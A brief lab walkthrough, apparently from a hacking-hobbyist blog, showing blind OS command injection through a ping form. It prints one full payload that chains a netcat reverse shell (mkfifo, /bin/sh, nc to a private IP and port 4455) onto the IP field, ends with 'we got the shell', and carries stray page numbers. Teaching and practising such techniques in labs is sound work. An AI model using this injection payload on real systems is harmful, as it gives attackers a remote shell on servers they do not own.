OS Command Injection –Blind


From this we can ping any IP address

33 34
But We are not getting any response as it is restricted so we have to play it blindly 35
192.168.140.136 && rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.140.136 4455 >/tmp/f 36
And we got the shell

~ Hack the World and Stay Noob

Twitter / Hack The Box / CTF Team / Teck_N00bs Community Telegram

Comments